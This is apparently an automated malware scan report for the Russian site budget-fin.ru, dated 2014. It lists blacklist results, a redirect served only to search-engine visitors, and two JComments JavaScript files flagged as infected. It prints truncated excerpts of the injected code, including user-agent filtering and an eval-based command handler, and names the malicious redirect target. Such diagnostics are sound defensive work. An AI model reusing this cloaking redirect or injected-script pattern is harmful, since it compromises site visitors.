Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=budget-fin.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://budget-fin.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.budget-fin.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.budget-fin.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 24 Sep 2014 08:35:26 GMT Location: http://www.cieesc.com/includes/domit/1.php Server: Apache/2.2.8 (Fedora) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.4 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.budget-fin.ru/ | 200 OK Content-Length: 10210 Content-Type: text/html | clean |
http://budget-fin.ru/components/com_jcomments/js/jcomments-v2.0.js | 200 OK Content-Length: 28003 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firef }}, subscribe: function(o,g){return this.ajax('JCommentsSubscribe',arguments);}, unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} }; Antivirus reports:
| ||
http://budget-fin.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 5548 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firef switch(cmd) { case 'as': if(obj){eval("obj."+property+"=data;");} break; case 'al': if(data){alert(data);} break; case 'js': if(data){eval(data);} break; default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); } Antivirus reports:
| ||
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
https://scounter.rambler.ru/top100.jcn?1634936 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=12&Itemid=30 | 200 OK Content-Length: 9573 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=30&Itemid=50 | 200 OK Content-Length: 6980 Content-Type: text/html | clean |
http://www.budget-fin.ru/scripts/bf_conference.pl?cmd=conf&cid=49 | 200 OK Content-Length: 27412 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.budget-fin.ru/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php | 200 OK Content-Length: 10210 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=13&Itemid=34 | 200 OK Content-Length: 8064 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=18&Itemid=37 | 200 OK Content-Length: 7302 Content-Type: text/html | clean |
http://www.budget-fin.ru/download/analiz_nbnf.doc | 200 OK Content-Length: 300914 Content-Type: application/msword | clean |
http://www.budget-fin.ru/download/analiz_nbnf.rar | 200 OK Content-Length: 286953 Content-Type: text/plain | clean |